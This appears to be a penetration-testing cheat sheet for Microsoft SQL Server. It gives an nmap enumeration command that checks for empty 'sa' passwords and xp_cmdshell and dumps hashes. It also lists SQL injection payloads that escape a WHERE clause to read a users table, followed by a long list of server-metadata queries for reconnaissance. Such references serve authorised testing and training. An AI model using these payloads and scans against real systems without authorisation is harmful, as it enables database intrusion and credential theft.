1433 - Pentesting mssql
Enumeration
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $IP
Bypass sql where clause
query
bypass examples1=1); select * from users; -- lorem ipsum
'1'='1'); select * from users; -- lorem ipsum
2>1); select * from users; -- lorem ipsum
Usefull querys
databases
tables columns(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), COLUMN_NAME), ',') from msdb.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users')
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), ROUTINE_NAME), ',') from INFORMATION_SCHEMA.ROUTINES)
(Select APP_NAME())
(Select DB_ID())
(Select DB_NAME())
(Select ORIGINAL_DB_NAME())
(Select SCHEMA_ID())
(Select SCHEMA_NAME())
(Select SCOPE_IDENTITY())
(Select VERSION())
(Select SERVERPROPERTY('BuildClrVersion'))
(Select SERVERPROPERTY('Collation'))
(Select SERVERPROPERTY('CollationID'))
(Select SERVERPROPERTY('ComparisonStyle'))
(Select SERVERPROPERTY('ComputerNamePhysicalNetBIOS'))
(Select SERVERPROPERTY('Edition'))
(Select SERVERPROPERTY('EditionID'))
(Select SERVERPROPERTY('EngineEdition'))
(Select SERVERPROPERTY('FilestreamConfiguredLevel'))
(Select SERVERPROPERTY('FilestreamEffectiveLevel'))
(Select SERVERPROPERTY('FilestreamShareName'))
(Select SERVERPROPERTY('HadrManagerStatus'))
(Select SERVERPROPERTY('InstanceDefaultBackupPath'))
(Select SERVERPROPERTY('InstanceDefaultDataPath'))
(Select SERVERPROPERTY('InstanceDefaultLogPath'))
(Select SERVERPROPERTY('InstanceName'))
(Select SERVERPROPERTY('IsAdvancedAnalyticsInstalled'))
(Select SERVERPROPERTY('IsBigDataCluster'))
(Select SERVERPROPERTY('IsClustered'))
(Select SERVERPROPERTY('IsExternalAuthenticationOnly'))
(Select SERVERPROPERTY('IsFullTextInstalled'))
(Select SERVERPROPERTY('IsHadrEnabled'))
(Select SERVERPROPERTY('IsIntegratedSecurityOnly'))
(Select SERVERPROPERTY('IsLocalDB'))
(Select SERVERPROPERTY('IsPolyBaseInstalled'))
(Select SERVERPROPERTY('IsServerSuspendedForSnapshotBackup'))
(Select SERVERPROPERTY('IsSingleUser'))
(Select SERVERPROPERTY('IsTempDbMetadataMemoryOptimized'))
(Select SERVERPROPERTY('IsXTPSupported'))
(Select SERVERPROPERTY('LCID'))
(Select SERVERPROPERTY('LicenseType'))
(Select SERVERPROPERTY('MachineName'))
(Select SERVERPROPERTY('NumLicenses'))
(Select SERVERPROPERTY('PathSeparator'))
(Select SERVERPROPERTY('ProcessID'))
(Select SERVERPROPERTY('ProductBuild'))
(Select SERVERPROPERTY('ProductBuildType'))
(Select SERVERPROPERTY('ProductLevel'))
(Select SERVERPROPERTY('ProductMajorVersion'))
(Select SERVERPROPERTY('ProductMinorVersion'))
(Select SERVERPROPERTY('ProductUpdateLevel'))
(Select SERVERPROPERTY('ProductUpdateReference'))
(Select SERVERPROPERTY('ProductVersion'))
(Select SERVERPROPERTY('ResourceLastUpdateDateTime'))
(Select SERVERPROPERTY('ResourceVersion'))
(Select SERVERPROPERTY('ServerName'))
(Select SERVERPROPERTY('SqlCharSet'))
(Select SERVERPROPERTY('SqlCharSetName'))
(Select SERVERPROPERTY('SqlSortOrder'))
(Select SERVERPROPERTY('SqlSortOrderName'))
(Select SERVERPROPERTY('SuspendedDatabaseCount'))